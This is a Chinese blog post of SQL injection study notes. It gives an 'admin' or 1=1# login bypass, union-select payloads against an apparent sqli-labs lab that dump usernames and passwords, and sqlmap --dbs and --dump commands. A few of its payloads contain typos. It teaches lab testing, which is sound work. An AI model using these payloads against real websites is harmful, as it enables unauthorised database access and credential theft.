web漏洞-sql注入

最新推荐文章于 2024-01-27 02:00:00 发布
最新推荐文章于 2024-01-27 02:00:00 发布
阅读量348 收藏
点赞数
分类专栏: 笔记 运维安全 文章标签: web安全 linux sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CN_SHzhaoyujie/article/details/103380942
版权

文章目录

SQL注入原理

SQL:结构化查询语言,是一种特殊目的的编程语言,一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。

原理:通过构建特殊的输入把恶意的SQL语句插入到web提交表单或页面请求的查询字符串中,从而欺骗服务器执行恶意的SQL语句,获取攻击者想要的信息。

发生场景:一切输入的地方,与数据交互的地方。

acccess+asp注入基本流程

1)判断有无注入点
2)猜解表名
3)猜解字段
4)猜解管理员ID值
5)猜解用户名和密码长度
6)猜解用户名和密码

SQL注入发现

①通过web漏洞扫描器
②在参数后面添加错误语句
③大量的对参数Fuzz测试
④直觉

注入分类

  1. 数字型注入
    SELECT * FROM users WHERE id=$id LIMIT 0,1;
    2。 字符型注入
    SELECT * FROM users WHERE username=’admin’ LIMIT 0,1;

注入提交方式

  1. GET
  2. POST
  3. COOKIE
  4. HTTP头部注入

注入方式

  1. 基于报错注入
  2. 基于布尔的盲注
  3. 基于时间的盲注
  4. 联合查询
  5. 内联查询
  6. 堆叠的查询

SQL手工注入

  1. php万能密码 admin’ or 1=1#

原理如果网站账号为admin,密码为admin

则正常登陆sql语句为:select * from user where username='$user' and password='pass';

注入后语句为:select * from user where username='admin' or 1=1#' and password='pass';

手工注入流程:

  1. 猜解字段
  2. 查看当前数据库
  3. 查询所有数据库
  4. 查询数据库中的表
  5. 查询表名中的所有字段

实例操作过程:

http://192.168.4.4:8003/Less-1/?id=1’ order by 11%23      #判断是否有11个字段(%23表示#号)

http://192.168.4.4:8003/Less-1/?id=-1’ union select 1,2,3%23       #联合查询

http://192.168.4.4:8003/Less-1/?id=-1’ union select 1,version(),3%23     #查看版本

http://192.168.4.4:8003/Less-1/?id=-1’ union select 1,user(),3%23          #当前用户权限

http://192.168.4.4:8003/Less-1/?id=-1’ union select 1,database(),3%23   #查看当前使用数据库

http://192.168.4.4:8003/Less-1/?id=-1’ Union select 1,group_concat(schema_name),3 from information_schema.schemata%23        #查询所有数据库

http://192.168.4.4:8003/Less-1/?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23             #查询数据库中的表,其中7365637572697479为数据库名的16进制数

http://192.168.4.4:8003/Less-1/?id=-1’ UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM infomation_schema,columns WHERE table_name = 0x7573657273%23  #查询表名中的所有字段,其中7573657273为表名的16进制数

http://192.168.4.4:8003/Less-1/?id=-1’ union select 1,,concat(username,0x3a,password),3 from users%23       #联合查询

常见查看数据库信息的函数:

version()    数据库版本
user()         用户名
database()  查看数据库

sqlmap的使用

使用环境:python
官网:http://sqlmap.org
启动运行:python sqlmap.py

常用参数

python sqlmap.py -u http://URL -v 3                     #判断注入,1-6级别,越高显示信息越详细
python sqlmap.py -u http://URL -v 3 --dbs            #数据库
python sqlmap.py -u http://URL -v 3 --current-user        #当前用户
python sqlmap.py -u http://URL -v 3 --current-db          #当前数据库
python sqlmap.py -u http://URL -v 3 --tables -D 数据库名                  #查查询表
python sqlmap.py -u http://URL -v 3 --column -T 表名 -D 数据库名   #查询字段
python sqlmap.py -u http://URL -v 3 --dump -T 表名 -D 数据库名     #显示表中全部内容
python sqlmap.py -u http://URL -v 3 --dump -C 字段名 -T 表名 -D 数据库名    #显示字段中的内容

针对POST方式的注入

  1. 使用burpsuite进行抓包
java -jar Burpsuite  ##运行软件
  1. 把捉到的包数据放入文件中
python sqlmap.py -r 1.txt -v 3

防护SQL注入

  1. CDN隐藏真实IP地址
  2. 通过安全函数进行过滤
  3. 对数据库最小权限设置
  4. 服务器针对性的WAF防火墙
CN_SHzhaoyujie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GET注入--显错注入
jeammy06061026的博客
05-16 2081
GET-基于错误-字符型-单引号 MySQL语法问题 –后面"+"的作用? 2、单引号和双引号 双引号会把后面注释的“–”显示出来,暂时没发现其他区别
POST注入-显错注入 ——合天网安实验室学习笔记
weixin_42582241的博客
03-19 1261
实验链接 POST是HTTP/1.1协议中的一种资源请求方法。其向指定资源提交数据,请求服务器进行处理(例如提交表单或者上传文件)。本实验主要介绍了POST传送工具的使用,学会根据显错信息来设定注入语句。 链接:http://www.hetianlab.com/expc.do?ce=d2ed6f88-8aa7-489a-ac4a-371fa8b750ac 实验简介 实验所属系列: SQL注入初级 ...
网络安全从入门到精通(第四章-2)GET&POST&HEAD注入
weixin_43643758的博客
03-29 484
本文内容: GET注入 POST注入 Head注入 sqlmap工具注入 get&post为显错注入: head为报错注入: 1,GET注入:   get注入属于显错注入。     1.判断注入点:       最古老的的方法是:         http://www.xxx.com/new.php?id=1 and 1=1 页面显示正常。         http:...
GET和POST的区别
weixin_30645617的博客
08-28 133
1.GET把参数包含在URL中,POST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
SQL注入之GET型
qq_51393133的博客
09-11 969
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
SQL注入攻击中,我们需要了解数据库的特性,如 MySQL、SQL Server、Oracle 等数据库管理系统的注释符、空白符、特殊符号等。例如,在 MySQL 中,注释符有三种:#、/*...*/、-- ;空格符有多种,如[0x09,0x0a-0x0d...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
在网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入、加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
WEB漏洞学习-sql注入
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
SQL注入漏洞-GET注入
HacHunter的博客
03-05 2901
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
用友移动管理系统 getApp SQL注入漏洞复现
最新发布
0xSec
01-27 331
用友移动管理系统 getApp功能点未对用户的输入进行过滤,导致存在SQL注入漏洞,利用此漏洞攻击者可以获取数据库敏感信息及凭证,使系统处于极度不安全状态。
ASP.NET开发实践系列课程SQL注入攻击(SQL Injection)
weixin_30737363的博客
07-26 159
发生于数据层的安全漏洞,在输入数据字符串中夹带SQL指令,在设计不良的程序中忽略了检查。主要原因使用字符串连接方式组合SQL指令使用权限过大的账户开放了不必要但权力过大的功能太过于信任用户所输入的数据,未限制输入的字符数,以及未对用户输入的数据做潜在指令的检查注入原理组合SQL命令字符串,未针对单引号字符串做取代处理的话,将导致该字符串变量在填入命令字符串时,被恶意篡改原本的SQL语法的作用。危害...
sql注入(get型)漏洞
qq_58970968的博客
03-29 1950
1,概念 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一,攻击过程 信息探测 kali里面主要下面三个探测方式: ·扫描主机服务信息以及服务版本 -- nmap -sV 靶场IP地址 如下图所示: ·快速扫描主机全部信息 -- nmap -T4 -A -v 靶场IP地址 这个与上面的比较起来扫描时间会更多,但信息会更
asp.net解决SQL注入代码
weixin_30776863的博客
03-20 88
public static class CheckChar { #region SQL注入式攻击代码分析 /// <summary> /// 处理用户提交的请求 /// </summary> public static void StartProcessRequ...
防止GET和POST方式引起的SQL注入攻击ASP程序
01-11 4950
编写通用的SQL防注入程序一般的http请求不外乎get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否受到SQL注入攻击。IIS传递给asp.dll的get 请求是是以字符串的形式,当传递给Request.QueryString数据后,asp解析器会分析Request.QueryString的信息,,
SQL注入--基于错误的GET单引号字符型注入
Leslieyzz的博客
02-14 476
SQL注入--基于错误的GET单引号字符型注入
SQL注入漏洞原理,基本方法,绕过方法及防御
qq_62886656的博客
05-03 8117
目录 一,原理 二,如何注入? 1, 联合注入 2,基于错误的注入 3,布尔盲注 4,延时注入 三,绕过方法添加注释 四,防御方式 一,原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 从过程上分析,在前端构造一份表单,可以是输入账号密码,也可以是其他能够输入并提交的功能,向后端传输数据的时候,如果我
SQL中的GET显错注入
m0_69676459的博客
04-30 594
SQL中GET注入
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值